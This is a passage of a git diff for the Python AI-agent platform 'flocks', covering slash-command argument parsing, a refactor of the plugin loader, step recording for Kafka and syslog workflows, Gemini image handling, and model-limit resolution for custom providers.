+from flocks.input.events import ParsedCommand
 
 
 SendText = Callable[[str], Awaitable[None]]
@@ -17,36 +18,53 @@
 async def handle_slash_command(
     content: str,
     *,
+    parsed_command: Optional[ParsedCommand] = None,
     send_text: SendText,
     send_prompt: SendPrompt,
     clear_screen: Optional[ClearScreen] = None,
     clear_history: Optional[ClearHistory] = None,
     surface: Optional[CommandSurface] = None,
+    session_id: Optional[str] = None,
 ) -> bool:
     """
     Handle supported slash commands.
 
     Returns True if handled.
     """
-    stripped = content.strip()
-    if not stripped.startswith("/"):
-        return False
+    parsed = parsed_command
+    if parsed is None:
+        stripped = content.strip()
+        if not stripped.startswith("/"):
+            return False
 
-    cmd_parts = stripped[1:].split(None, 1)
-    if not cmd_parts:
-        return False
+        cmd_parts = stripped[1:].split(None, 1)
+        if not cmd_parts:
+            return False
+        parsed = ParsedCommand(
+            raw_text=stripped,
+            command_name=cmd_parts[0].lower(),
+            canonical_name=cmd_parts[0].lower(),
+            args=cmd_parts[1].strip() if len(cmd_parts) > 1 else "",
+        )
 
-    resolved = Command.resolve(cmd_parts[0].lower())
+    resolved = Command.resolve(parsed.command_name)
     if not resolved or resolved.execution_kind != "direct":
         return False
 
     name = resolved.name
-    args = cmd_parts[1].strip() if len(cmd_parts) > 1 else ""
-    result = await run_direct_command(name, args=args, surface=surface)
+    result = await run_direct_command(
+        name,
+        args=parsed.args,
+        args_json=parsed.args_json,
+        surface=surface,
+        session_id=session_id,
+    )
     if not result.handled:
         return False
 
     if result.prompt is not None:
+        if result.text:
+            await send_text(result.text)
         await send_prompt(result.prompt)
         return True
 
diff --git a/flocks/hooks/pipeline.py b/flocks/hooks/pipeline.py
index 1a8c7eb84..817406c57 100644
--- a/flocks/hooks/pipeline.py
+++ b/flocks/hooks/pipeline.py
@@ -206,7 +206,8 @@ async def ensure_initialized(cls, project_dir: Optional[Path] = None) -> None:
             from flocks.plugin import PluginLoader
 
             cfg = await Config.get()
-            PluginLoader.load_all(
+            PluginLoader.load_extension(
+                "HOOKS",
                 extra_sources=cfg.plugin or [],
                 project_dir=load_project_dir,
             )
diff --git a/flocks/hub/installer.py b/flocks/hub/installer.py
index c28cb25f0..7f37d2b9a 100644
--- a/flocks/hub/installer.py
+++ b/flocks/hub/installer.py
@@ -131,10 +131,12 @@ async def _refresh_runtime(plugin_type: PluginType) -> None:
         # the Device Access wizard (the latter consumes
         # ``api_services[storage_key]`` shaped by ``discover_api_service_descriptors``).
         from flocks.config.api_versioning import discover_api_service_descriptors
+        from flocks.tool.device.plugin_index import clear_device_template_cache
         from flocks.tool.registry import ToolRegistry
 
         ToolRegistry.init()
         ToolRegistry.refresh_plugin_tools()
+        clear_device_template_cache()
         # Drop the descriptor cache so freshly installed/uninstalled
         # API plugins surface in ``_load_provider_yaml_metadata`` (and
         # therefore in the Tool API summary metadata) without waiting
diff --git a/flocks/ingest/kafka/manager.py b/flocks/ingest/kafka/manager.py
index 37187f732..34a30a07f 100644
--- a/flocks/ingest/kafka/manager.py
+++ b/flocks/ingest/kafka/manager.py
@@ -34,6 +34,7 @@
     compact_history_for_storage,
     compact_outputs_for_storage,
     create_execution_record,
+    ExecutionStepRecorder,
     record_execution_result,
     resolve_execution_outcome,
 )
@@ -209,6 +210,20 @@ def _compact_history_for_kafka_storage(
     return compacted
 
 
+def _compact_step_for_kafka_storage(
+    step: Any,
+    *,
+    input_key: str,
+    input_keys: Iterable[str] | None = None,
+) -> Dict[str, Any]:
+    """Compact one step via the history compactor; ``{}`` unless the result is a dict."""
+    rows = _compact_history_for_kafka_storage([step], input_key=input_key, input_keys=input_keys)
+    if not rows:
+        return {}
+    head = rows[0]
+    return head if isinstance(head, dict) else {}
+
+
 class KafkaManager:
     """One async consumer task per workflow id (when enabled)."""
 
@@ -655,9 +670,21 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                 input_params=summarized_inputs,
             )
             exec_id = exec_data["id"]
+            loop = asyncio.get_running_loop()
             start_time = time.time()
             trigger_meta = mapped_inputs.get("_flocks", {}).get("trigger", {})
             trigger_input_keys = list((trigger.mapping or {}).keys()) or [input_key]
+            step_recorder = ExecutionStepRecorder(
+                exec_id=exec_id,
+                loop=loop,
+                logger=log,
+                log_event="kafka.execution_step.write_failed",
+                step_compactor=lambda step: _compact_step_for_kafka_storage(
+                    step,
+                    input_key=input_key,
+                    input_keys=trigger_input_keys,
+                ),
+            )
             try:
                 result = await asyncio.to_thread(
                     run_workflow,
@@ -665,23 +692,23 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                     inputs=mapped_inputs,
                     trace=False,
                     history_mode="summary",
+                    on_step_complete=step_recorder.on_step_complete,
                 )
                 status, error_msg = resolve_execution_outcome(result)
                 duration = time.time() - start_time
+                step_count = step_recorder.step_count or result.steps
+                exec_data.update(step_recorder.summary)
                 exec_data.update({
                     "status": status,
                     "outputResults": _compact_for_kafka_storage(result.outputs),
                     "finishedAt": int(time.time() * 1000),
                     "duration": duration,
                     "errorMessage": error_msg,
-                    "executionLog": _compact_history_for_kafka_storage(
-                        result.history,
-                        input_key=input_key,
-                        input_keys=trigger_input_keys,
-                    ),
+                    "executionLog": [],
+                    "stepCount": step_count,
                     "currentNodeId": result.last_node_id,
                     "currentPhase": status,
-                    "currentStepIndex": result.steps,
+                    "currentStepIndex": step_count,
                     "triggerId": trigger.id,
                     "triggerType": trigger.type,
                     "deliveryId": trigger_meta.get("deliveryId"),
@@ -694,11 +721,13 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                     "kafka.workflow_run_failed",
                     {"workflow_id": workflow_id, "exec_id": exec_id, "error": str(exc)},
                 )
+                exec_data.update(step_recorder.summary)
                 exec_data.update({
                     "status": "error",
                     "errorMessage": str(exc),
                     "finishedAt": int(time.time() * 1000),
                     "duration": duration,
+                    "executionLog": [],
                     "currentPhase": "error",
                     "triggerId": trigger.id,
                     "triggerType": trigger.type,
diff --git a/flocks/ingest/syslog/manager.py b/flocks/ingest/syslog/manager.py
index 8e938dbd4..5c45b8d51 100644
--- a/flocks/ingest/syslog/manager.py
+++ b/flocks/ingest/syslog/manager.py
@@ -10,9 +10,9 @@
 from flocks.storage.storage import Storage
 from flocks.utils.log import Log
 from flocks.workflow.execution_store import (
-    compact_history_for_storage,
     compact_outputs_for_storage,
     create_execution_record,
+    ExecutionStepRecorder,
     record_execution_result,
     resolve_execution_outcome,
 )
@@ -522,6 +522,13 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                 input_params=summarized_inputs,
             )
             exec_id = exec_data["id"]
+            loop = asyncio.get_running_loop()
+            step_recorder = ExecutionStepRecorder(
+                exec_id=exec_id,
+                loop=loop,
+                logger=log,
+                log_event="syslog.execution_step.write_failed",
+            )
             start_time = time.time()
             trigger_meta = mapped_inputs.get("_flocks", {}).get("trigger", {})
             try:
@@ -530,19 +537,23 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                     workflow=workflow_json,
                     inputs=mapped_inputs,
                     trace=False,
+                    on_step_complete=step_recorder.on_step_complete,
                 )
                 status, error_msg = resolve_execution_outcome(result)
                 duration = time.time() - start_time
+                step_count = step_recorder.step_count or result.steps
+                exec_data.update(step_recorder.summary)
                 exec_data.update({
                     "status": status,
                     "outputResults": compact_outputs_for_storage(result.outputs),
                     "finishedAt": int(time.time() * 1000),
                     "duration": duration,
                     "errorMessage": error_msg,
-                    "executionLog": compact_history_for_storage(result.history),
+                    "executionLog": [],
+                    "stepCount": step_count,
                     "currentNodeId": result.last_node_id,
                     "currentPhase": status,
-                    "currentStepIndex": result.steps,
+                    "currentStepIndex": step_count,
                     "triggerId": trigger.id,
                     "triggerType": trigger.type,
                     "deliveryId": trigger_meta.get("deliveryId"),
@@ -555,11 +566,13 @@ async def _executor(mapped_inputs: Dict[str, Any]) -> Dict[str, Any]:
                     "syslog.workflow_run_failed",
                     {"workflow_id": workflow_id, "exec_id": exec_id, "error": str(exc)},
                 )
+                exec_data.update(step_recorder.summary)
                 exec_data.update({
                     "status": "error",
                     "errorMessage": str(exc),
                     "finishedAt": int(time.time() * 1000),
                     "duration": duration,
+                    "executionLog": [],
                     "currentPhase": "error",
                     "triggerId": trigger.id,
                     "triggerType": trigger.type,
diff --git a/flocks/input/dispatcher.py b/flocks/input/dispatcher.py
index 4d64b6ebf..95f8c9916 100644
--- a/flocks/input/dispatcher.py
+++ b/flocks/input/dispatcher.py
@@ -3,7 +3,7 @@
 from __future__ import annotations
 
 from dataclasses import dataclass
-from typing import Optional
+from typing import Any, Dict, Optional
 
 from flocks.command.command import Command
 from flocks.command.handler import handle_slash_command
@@ -20,7 +20,10 @@ class DispatchResult:
     handled: bool = True
 
 
-def parse_slash_command(text: str) -> Optional[ParsedCommand]:
+def parse_slash_command(
+    text: str,
+    metadata: Optional[Dict[str, Any]] = None,
+) -> Optional[ParsedCommand]:
     """Parse slash text into a command and registry metadata."""
     stripped = (text or "").strip()
     if not stripped.startswith("/"):
@@ -38,6 +41,7 @@ def parse_slash_command(text: str) -> Optional[ParsedCommand]:
         command_name=command_name.lower(),
         canonical_name=canonical_name,
         args=raw_args.strip(),
+        args_json=metadata.get("commandArgumentsJson") if isinstance(metadata, dict) else None,
         command_def=command_def,
     )
 
@@ -48,7 +52,7 @@ def _has_non_text_parts(event: UserInputEvent) -> bool:
 
 async def dispatch_user_input(event: UserInputEvent, sink: OutputSink) -> DispatchResult:
     """Route a normalized user input through direct / llm / session-control paths."""
-    parsed = parse_slash_command(event.text)
+    parsed = parse_slash_command(event.text, event.metadata)
     if parsed is None:
         await sink.run_llm(event, event.text, event.display_text)
         return DispatchResult(action="llm", handled=False)
@@ -112,14 +116,18 @@ async def _collect_prompt(prompt: str) -> None:
         clear_history_cb = getattr(sink, "_clear_history", None)
         handled = await handle_slash_command(
             parsed.raw_text,
+            parsed_command=parsed,
             send_text=_collect_text,
             send_prompt=_collect_prompt,
             clear_screen=clear_cb,
             clear_history=clear_history_cb,
             surface=sink.surface,
+            session_id=event.session_id,
         )
         if handled:
             if llm_prompts:
+                if direct_texts:
+                    await sink.publish_direct_response(event, "\n".join(direct_texts))
                 await sink.run_llm(
                     event,
                     llm_prompts[0],
diff --git a/flocks/input/events.py b/flocks/input/events.py
index 0995b8db5..d0fd4e54c 100644
--- a/flocks/input/events.py
+++ b/flocks/input/events.py
@@ -50,4 +50,5 @@ class ParsedCommand(BaseModel):
     command_name: str
     canonical_name: str
     args: str = ""
+    args_json: Optional[Any] = None
     command_def: Optional[CommandInfo] = None
diff --git a/flocks/plugin/loader.py b/flocks/plugin/loader.py
index 0c1c897e2..b0144a178 100644
--- a/flocks/plugin/loader.py
+++ b/flocks/plugin/loader.py
@@ -8,10 +8,11 @@
 - how to validate items and detect duplicates,
 - a *consumer* callback that receives the validated items.
 
-``PluginLoader.load_all()`` is called once during startup.  For every
-registered extension point it scans the corresponding subdirectory, loads each
-``.py`` module, extracts and validates the attribute, then hands the items to
-the consumer.
+``PluginLoader.load_all()`` loads every registered extension point.
+``PluginLoader.load_extension("TOOLS")`` loads one registered extension point
+with the same filesystem scanning rules. For every loaded extension point it
+scans the corresponding subdirectory, loads each ``.py`` module, extracts and
+validates the attribute, then hands the items to the consumer.
 
 Safety guarantees
 -----------------
@@ -231,61 +232,14 @@ def load_all(
         4. Validate, dedup, and dispatch to the consumer.
         """
         project_dir = project_dir or Path.cwd()
-        project_plugin_root = project_dir / ".flocks" / "plugins"
 
         for ext in cls._extension_points.values():
-            if ext.load_once and ext._loaded:
-                log.debug(
-                    "plugin.load_all.skip_load_once",
-                    {
-                        "attr": ext.attr_name,
-                    },
-                )
-                continue
-
-            ext._seen_keys = set()
-
-            # 1. User-level plugin subdirectory (~/.flocks/plugins/{subdir}/)
-            subdir_path = cls._plugin_root / ext.subdir
-            default_sources = scan_directory(
-                subdir_path,
-                recursive=ext.recursive,
-                max_depth=ext.max_depth,
-                exclude_subdirs=ext.exclude_subdirs,
+            cls._load_extension_point(
+                ext,
+                extra_sources=extra_sources,
+                project_dir=project_dir,
+                log_scope="load_all",
             )
-            if default_sources:
-                log.debug(
-                    "plugin.scan",
-                    {
-                        "subdir": ext.subdir,
-                        "files": [Path(s).name for s in default_sources],
-                    },
-                )
-            cls._load_sources_for_ext(ext, default_sources, subdir_path)
-
-            # 2. Project-level plugin subdirectory (<project>/.flocks/plugins/{subdir}/)
-            project_subdir_path = project_plugin_root / ext.subdir
-            if project_subdir_path != subdir_path and project_subdir_path.is_dir():
-                project_sources = scan_directory(
-                    project_subdir_path,
-                    recursive=ext.recursive,
-                    max_depth=ext.max_depth,
-                    exclude_subdirs=ext.exclude_subdirs,
-                )
-                if project_sources:
-                    log.debug(
-                        "plugin.project.scan",
-                        {
-                            "subdir": ext.subdir,
-                            "project_dir": str(project_dir),
-                            "files": [Path(s).name for s in project_sources],
-                        },
-                    )
-                    cls._load_sources_for_ext(ext, project_sources, project_subdir_path)
-
-            # 3. Explicit sources from cfg.plugin
-            if extra_sources:
-                cls._load_sources_for_ext(ext, extra_sources, project_dir)
 
             if ext.load_once:
                 ext._loaded = True
@@ -293,6 +247,39 @@ def load_all(
         # 4. Installed package entry-points
         cls._load_entry_points()
 
+    @classmethod
+    def load_extension(
+        cls,
+        attr_name: str,
+        extra_sources: Optional[List[str]] = None,
+        project_dir: Optional[Path] = None,
+        *,
+        load_entry_points: bool = False,
+    ) -> None:
+        """Load a single registered extension point, looked up by ``attr_name``.
+
+        Scoped counterpart to :meth:`load_all`: scanning is delegated to
+        ``_load_extension_point`` for the requested attribute only (for example
+        ``"TOOLS"``). An unregistered ``attr_name`` logs a warning and returns.
+
+        Args:
+            attr_name: Key of the extension point in ``_extension_points``.
+            extra_sources: Explicit plugin sources passed through to the scan.
+            project_dir: Base directory for the scan; defaults to ``Path.cwd()``.
+            load_entry_points: Also run ``_load_entry_points`` afterwards, for
+                legacy package plugins in the ``flocks.plugins`` entry-point group.
+        """
+        target = cls._extension_points.get(attr_name)
+        if target is None:
+            log.warn("plugin.ext_point.not_found", {"attr": attr_name})
+            return
+        base_dir = project_dir or Path.cwd()
+        cls._load_extension_point(
+            target, extra_sources=extra_sources, project_dir=base_dir, log_scope="load_extension"
+        )
+        if load_entry_points:
+            cls._load_entry_points()
+
     @classmethod
     def load_for_extension(
         cls,
@@ -357,6 +344,73 @@ def load_default_for_extension(cls, attr_name: str) -> List[Any]:
     # Internal
     # ------------------------------------------------------------------
 
+    @classmethod
+    def _load_extension_point(
+        cls,
+        ext: ExtensionPoint,
+        *,
+        extra_sources: Optional[List[str]],
+        project_dir: Path,
+        log_scope: str,
+    ) -> None:
+        """Scan and load one registered extension point.
+
+        Sources are loaded in a fixed order: the user-level plugin
+        subdirectory, then the project-level one (when it is a different,
+        existing directory), then any explicit ``extra_sources``.
+
+        Args:
+            ext: Extension point to populate; its ``_seen_keys`` set is reset
+                before scanning.
+            extra_sources: Explicit sources, handed over with ``project_dir``.
+            project_dir: Base under which ``.flocks/plugins/<subdir>`` is scanned.
+            log_scope: Name spliced into the "skip" debug event.
+        """
+        already_loaded = ext.load_once and ext._loaded
+        if already_loaded:
+            log.debug(f"plugin.{log_scope}.skip_load_once", {"attr": ext.attr_name})
+            return
+
+        ext._seen_keys = set()
+        project_root = project_dir / ".flocks" / "plugins"
+
+        # 1. User-level plugin subdirectory (~/.flocks/plugins/{subdir}/).
+        #    Handed to the loader unconditionally, even when the scan is empty.
+        user_dir = cls._plugin_root / ext.subdir
+        user_files = scan_directory(
+            user_dir,
+            recursive=ext.recursive,
+            max_depth=ext.max_depth,
+            exclude_subdirs=ext.exclude_subdirs,
+        )
+        if user_files:
+            names = [Path(item).name for item in user_files]
+            log.debug("plugin.scan", {"subdir": ext.subdir, "files": names})
+        cls._load_sources_for_ext(ext, user_files, user_dir)
+
+        # 2. Project-level plugin subdirectory (<project>/.flocks/plugins/{subdir}/).
+        #    Skipped when it equals the user-level path or is not a directory.
+        project_ext_dir = project_root / ext.subdir
+        if project_ext_dir != user_dir and project_ext_dir.is_dir():
+            project_files = scan_directory(
+                project_ext_dir,
+                recursive=ext.recursive,
+                max_depth=ext.max_depth,
+                exclude_subdirs=ext.exclude_subdirs,
+            )
+            if project_files:
+                names = [Path(item).name for item in project_files]
+                details = {"subdir": ext.subdir, "project_dir": str(project_dir), "files": names}
+                log.debug("plugin.project.scan", details)
+                cls._load_sources_for_ext(ext, project_files, project_ext_dir)
+
+        # 3. Explicit sources from cfg.plugin
+        if extra_sources:
+            cls._load_sources_for_ext(ext, extra_sources, project_dir)
+
+        if ext.load_once:
+            ext._loaded = True
+
     @classmethod
     def _load_entry_points(cls) -> None:
         """
diff --git a/flocks/provider/catalog.json b/flocks/provider/catalog.json
index b2a02615d..363d1408d 100644
--- a/flocks/provider/catalog.json
+++ b/flocks/provider/catalog.json
@@ -57,6 +57,7 @@
         "family": "minimax",
         "capabilities": {
           "supports_tools": true,
+          "supports_vision": true,
           "supports_reasoning": true,
           "interleaved": {
             "field": "reasoning_details",
diff --git a/flocks/provider/options.py b/flocks/provider/options.py
index d3222f979..07cb66def 100644
--- a/flocks/provider/options.py
+++ b/flocks/provider/options.py
@@ -71,6 +71,27 @@ def _resolve_reasoning_enabled(provider_id: str, model_id: str) -> Optional[bool
         return None
 
 
+def _resolve_default_extra_body(provider_id: str, model_id: str) -> Optional[Dict[str, Any]]:
+    """Return a copy of the model setting's ``default_parameters["extra_body"]`` dict.
+
+    Gives ``None`` when no setting exists, the value is not a dict, or the lookup
+    raises; a raised error is only logged at debug level.
+    """
+    try:
+        from flocks.provider.model_manager import get_model_manager
+
+        setting = get_model_manager().get_setting(provider_id, model_id)
+        params = (setting.default_parameters or {}) if setting else {}
+        configured = params.get("extra_body")
+        if isinstance(configured, dict):
+            # Shallow copy, so the caller does not receive the stored dict itself.
+            return dict(configured)
+    except Exception as exc:
+        failure = {"provider_id": provider_id, "model_id": model_id, "error": str(exc)}
+        log.debug("options.extra_body_setting_lookup_failed", failure)
+    return None
+
+
 def _lookup_raw_model_metadata(provider_id: str, model_id: str) -> Optional[Any]:
     """Return provider/model metadata without applying inferred defaults."""
     try:
@@ -269,6 +290,7 @@ def build_provider_options(
         if reasoning_enabled is not None
         else _resolve_reasoning_enabled(provider_id, model_id)
     )
+    configured_extra_body = _resolve_default_extra_body(provider_id, model_id)
     interleaved_enabled = interleaved_capability is not None
     if interleaved_enabled and reasoning_enabled is None:
         reasoning_enabled = True
@@ -322,11 +344,12 @@ def build_provider_options(
     # most reasoning_content models use enable_thinking, while MiniMax's
     # OpenAI-compatible interleaved format uses reasoning_split so the model
     # returns reasoning_details that can be replayed in later tool turns.
-    elif (
-        (interleaved_enabled or reasoning_enabled is True)
-        and reasoning_transport == REASONING_TRANSPORT_GENERIC_CHAT
+    elif reasoning_transport == REASONING_TRANSPORT_GENERIC_CHAT and (
+        configured_extra_body
+        or interleaved_enabled
+        or reasoning_enabled is True
     ):
-        extra_body = _build_generic_chat_extra_body(
+        extra_body = configured_extra_body or _build_generic_chat_extra_body(
             provider_id,
             model_id,
             interleaved_capability,
@@ -391,4 +414,3 @@ def _apply_max_tokens_from_config(
             "model_id": model_id,
             "max_tokens": model_info.capabilities.max_tokens,
         })
-
diff --git a/flocks/provider/sdk/google.py b/flocks/provider/sdk/google.py
index 70de20b6f..39df39669 100644
--- a/flocks/provider/sdk/google.py
+++ b/flocks/provider/sdk/google.py
@@ -3,6 +3,7 @@
 """
 
 import os
+import base64
 import json
 import re
 from typing import List, AsyncIterator, Optional, Dict, Any
@@ -20,6 +21,20 @@
 log = Log.create(service="provider.google")
 
 
+def _image_block_to_gemini_part(block: Dict[str, Any]) -> Optional[Dict[str, Any]]:
+    """Build a Gemini ``inline_data`` part from an image block's ``data``/``mimeType``.
+
+    Returns ``None`` when either field is missing or empty.
+    """
+    payload = block.get("data")
+    mime_type = block.get("mimeType")
+    if payload and mime_type:
+        # The output key is ``mime_type``; the incoming block key is ``mimeType``.
+        inline = {"data": payload, "mime_type": mime_type}
+        return {"inline_data": inline}
+    return None
+
+
 class GoogleProvider(BaseProvider):
     """Google (Gemini) provider with ReAct text-to-tool parsing and robust error handling"""
 
@@ -132,12 +147,16 @@ def _convert_messages(
                         elif p.type == "file":
                             mime = getattr(p, "mime", "")
                             if mime.startswith("image/"):
-                                parts.append({
-                                    "inline_data": {
-                                        "data": p.url.split(",")[-1] if "," in p.url else p.url,
-                                        "mime_type": mime
-                                    }
-                                })
+                                from flocks.session.utils.file_extractor import read_file_part_bytes
+
+                                data = read_file_part_bytes(getattr(p, "url", ""))
+                                if data:
+                                    parts.append({
+                                        "inline_data": {
+                                            "data": base64.b64encode(data).decode("utf-8"),
+                                            "mime_type": mime,
+                                        }
+                                    })
 
                     gemini_role = "model" if role == "assistant" else "user"
                     if parts:
@@ -179,6 +198,10 @@ def _convert_messages(
                     for p in msg.content:
                         if isinstance(p, dict) and p.get("type") == "text":
                             parts.append({"text": p["text"]})
+                        elif isinstance(p, dict) and p.get("type") == "image":
+                            image_part = _image_block_to_gemini_part(p)
+                            if image_part:
+                                parts.append(image_part)
                 
                 if msg.tool_calls:
                     for tc in msg.tool_calls:
diff --git a/flocks/provider/sdk/openai_base.py b/flocks/provider/sdk/openai_base.py
index 90a7663fe..7c8c595b6 100644
--- a/flocks/provider/sdk/openai_base.py
+++ b/flocks/provider/sdk/openai_base.py
@@ -29,7 +29,7 @@
 # change covers all three providers. Granular values (instead of a flat
 # timeout) let small control-plane requests fail fast while multimodal
 # (image) uploads get the headroom they need on slow links.
-DEFAULT_HTTP_TIMEOUT = httpx.Timeout(connect=30.0, read=600.0, write=600.0, pool=60.0)
+DEFAULT_HTTP_TIMEOUT = httpx.Timeout(connect=30.0, read=180.0, write=1800.0, pool=60.0)
 
 
 # Canonical OpenAI-style content translation, shared by every provider that
diff --git a/flocks/server/app.py b/flocks/server/app.py
index 95f7a6f5e..a605d33b4 100644
--- a/flocks/server/app.py
+++ b/flocks/server/app.py
@@ -322,11 +322,16 @@ def _sync_catalog_models_phase() -> None:
 
     # Sync workflows from .flocks/workflow/ filesystem into Storage
     try:
-        from flocks.server.routes.workflow import sync_workflows_from_filesystem
+        from flocks.server.routes.workflow import (
+            reconcile_published_workflow_api_services,
+            sync_workflows_from_filesystem,
+        )
 
         async def _sync_workflows_phase() -> None:
             imported = await sync_workflows_from_filesystem()
             log.info("workflow.sync.done", {"imported": imported})
+            api_services = await reconcile_published_workflow_api_services()
+            log.info("workflow.api_services.reconciled", api_services)
 
         _schedule_startup_phase(app, log, "workflow.sync_filesystem", _sync_workflows_phase)
     except Exception as e:
diff --git a/flocks/server/client.py b/flocks/server/client.py
index 4ac10a68b..7fb2c911d 100644
--- a/flocks/server/client.py
+++ b/flocks/server/client.py
@@ -13,7 +13,7 @@
 from flocks.agent.registry import Agent
 from flocks.project.project import Project
 from flocks.config.config import Config
-from flocks.mcp.server import get_manager
+from flocks.mcp import get_manager
 from flocks.storage.storage import Storage
 from flocks.utils.log import Log
 
@@ -85,11 +85,13 @@ async def command(
         model: str,
         agent: str,
         directory: str,
+        arguments_json: Optional[Any] = None,
     ) -> None:
         """Execute a command in the session"""
         log.info("session.command", {
             "session_id": session_id,
             "command": command,
+            "arguments_json": arguments_json is not None,
         })
     
     async def summarize(
diff --git a/flocks/server/routes/channel.py b/flocks/server/routes/channel.py
index 4ee07d1a3..aed3dc343 100644
--- a/flocks/server/routes/channel.py
+++ b/flocks/server/routes/channel.py
@@ -33,6 +33,8 @@ class SessionSendRequest(BaseModel):
     text: str
     channel_type: Optional[str] = None
     media_url: Optional[str] = None
+    account_id: Optional[str] = None
+    chat_id: Optional[str] = None
 
 
 @router.post("/send")
@@ -84,6 +86,19 @@ async def channel_session_send(req: SessionSendRequest):
                 detail=f"session '{req.session_id}' 未绑定渠道 '{req.channel_type}'",
             )
 
+    if req.account_id:
+        matched = [b for b in matched if b.account_id == req.account_id]
+    if req.chat_id:
+        matched = [b for b in matched if b.chat_id == req.chat_id]
+    if (req.account_id or req.chat_id) and not matched:
+        raise HTTPException(
+            status_code=404,
+            detail=(
+                f"session '{req.session_id}' 未绑定 account_id='{req.account_id}' "
+                f"chat_id='{req.chat_id}'"
+            ),
+        )
+
     all_results = []
     errors = []
     for binding in matched:
diff --git a/flocks/server/routes/custom_provider.py b/flocks/server/routes/custom_provider.py
index 19f1c361a..969d754ca 100644
--- a/flocks/server/routes/custom_provider.py
+++ b/flocks/server/routes/custom_provider.py
@@ -8,8 +8,10 @@
 Model unique name format: "{provider_id}/{model_id}"
 """
 
+import time
+from dataclasses import dataclass
 from datetime import UTC, datetime
-from typing import List, Optional
+from typing import Any, List, Optional
 
 from fastapi import APIRouter, HTTPException
 from pydantic import BaseModel, Field
@@ -45,6 +47,60 @@ def get_models(self) -> List[ModelInfo]:
 router = APIRouter()
 log = Log.create(service="routes.custom")
 
+FALLBACK_CONTEXT_WINDOW = 128000  # used when no other source supplies a context window
+FALLBACK_MAX_OUTPUT_TOKENS = 8192  # used when no other source supplies a max-output limit
+MODELS_DEV_URL = "https://models.dev/api.json"  # metadata document requested by _fetch_models_dev
+MODELS_DEV_TIMEOUT_SEC = 5.0  # timeout handed to httpx.AsyncClient for that request
+MODELS_DEV_CACHE_TTL_SEC = 3600.0  # how long a fetched payload is reused (time.monotonic seconds)
+
+_models_dev_cache: Optional[dict[str, Any]] = None  # last successfully fetched payload, if any
+_models_dev_cache_time = 0.0  # time.monotonic() value recorded for that payload
+
+_MODELS_DEV_PROVIDER_ALIASES = {  # lowercase Flocks provider id (or model-id prefix) -> models.dev provider key
+    "alibaba": "alibaba",
+    "anthropic": "anthropic",
+    "bailian": "alibaba",
+    "cerebras": "cerebras",
+    "cohere": "cohere",
+    "dashscope": "alibaba",
+    "deepinfra": "deepinfra",
+    "deepseek": "deepseek",
+    "gemini": "google",
+    "google": "google",
+    "groq": "groq",
+    "huggingface": "huggingface",
+    "kilocode": "kilo",
+    "kimi-coding": "kimi-for-coding",
+    "kimi-coding-cn": "kimi-for-coding",
+    "mistral": "mistral",
+    "minimax": "minimax",
+    "minimax-cn": "minimax-cn",
+    "nvidia": "nvidia",
+    "ollama-cloud": "ollama-cloud",
+    "opencode-go": "opencode-go",
+    "opencode-zen": "opencode",
+    "openai": "openai",
+    "openai-codex": "openai",
+    "openrouter": "openrouter",
+    "perplexity": "perplexity",
+    "qwen": "alibaba",
+    "qwen-oauth": "alibaba",
+    "siliconflow": "siliconflow",
+    "stepfun": "stepfun",
+    "together": "togetherai",
+    "togetherai": "togetherai",
+    "xai": "xai",
+    "xiaomi": "xiaomi",
+    "zai": "zai",
+}
+
+
+@dataclass
+class ResolvedModelLimits:  # value returned by _resolve_model_limits
+    context_window: int  # final context window after resolution
+    max_output_tokens: int  # final max output tokens after resolution
+    source: str  # one of "explicit", "catalog", "models_dev", "fallback"
+
 
 # ==================== Request / Response ====================
 
@@ -67,8 +123,8 @@ class ProviderResp(BaseModel):
 class CreateModelReq(BaseModel):
     model_id: str = Field(..., min_length=1)
     name: str = Field(..., min_length=1)
-    context_window: int = Field(128000, ge=1024)
-    max_output_tokens: int = Field(4096, ge=1)
+    context_window: Optional[int] = Field(None, ge=1024)
+    max_output_tokens: Optional[int] = Field(None, ge=1)
     supports_vision: bool = False
     supports_tools: bool = True
     supports_streaming: bool = True
@@ -208,8 +264,8 @@ async def list_models(provider_id: str):
             model_id=model_id,
             unique_name=f"{provider_id}/{model_id}",
             name=mcfg.get("name", model_id),
-            context_window=mcfg.get("context_window", 128000),
-            max_output_tokens=mcfg.get("max_output_tokens", 4096),
+            context_window=mcfg.get("context_window", FALLBACK_CONTEXT_WINDOW),
+            max_output_tokens=mcfg.get("max_output_tokens", FALLBACK_MAX_OUTPUT_TOKENS),
             input_price=mcfg.get("input_price", 0.0),
             output_price=mcfg.get("output_price", 0.0),
             currency=mcfg.get("currency", "USD"),
@@ -227,12 +283,13 @@ async def create_model(provider_id: str, body: CreateModelReq):
 
     models = raw.get("models", {})
     existing_model = models.get(body.model_id)
+    limits = await _resolve_model_limits(provider_id, body, raw)
 
     now = datetime.now(UTC).isoformat()
     model_config = {
         "name": body.name,
-        "context_window": body.context_window,
-        "max_output_tokens": body.max_output_tokens,
+        "context_window": limits.context_window,
+        "max_output_tokens": limits.max_output_tokens,
         "supports_vision": body.supports_vision,
         "supports_tools": body.supports_tools,
         "supports_streaming": body.supports_streaming,
@@ -247,14 +304,25 @@ async def create_model(provider_id: str, body: CreateModelReq):
     ConfigWriter.add_model(provider_id, body.model_id, model_config)
 
     # Add/update runtime
-    _add_model_to_runtime(provider_id, body)
+    _add_model_to_runtime(
+        provider_id,
+        body,
+        context_window=limits.context_window,
+        max_output_tokens=limits.max_output_tokens,
+    )
 
     action = "updated" if existing_model else "created"
-    log.info(f"custom_model.{action}", {"unique": f"{provider_id}/{body.model_id}"})
+    log.info(f"custom_model.{action}", {
+        "unique": f"{provider_id}/{body.model_id}",
+        "limits_source": limits.source,
+        "context_window": limits.context_window,
+        "max_output_tokens": limits.max_output_tokens,
+    })
     return ModelResp(
         id=body.model_id, provider_id=provider_id, model_id=body.model_id,
         unique_name=f"{provider_id}/{body.model_id}", name=body.name,
-        context_window=body.context_window, max_output_tokens=body.max_output_tokens,
+        context_window=limits.context_window,
+        max_output_tokens=limits.max_output_tokens,
         input_price=body.input_price, output_price=body.output_price,
         currency=body.currency, created_at=now,
     )
@@ -281,6 +349,244 @@ async def delete_model(provider_id: str, model_id: str):
 # ==================== Runtime helpers ====================
 
 
+def _coerce_positive_int(value: Any) -> Optional[int]:
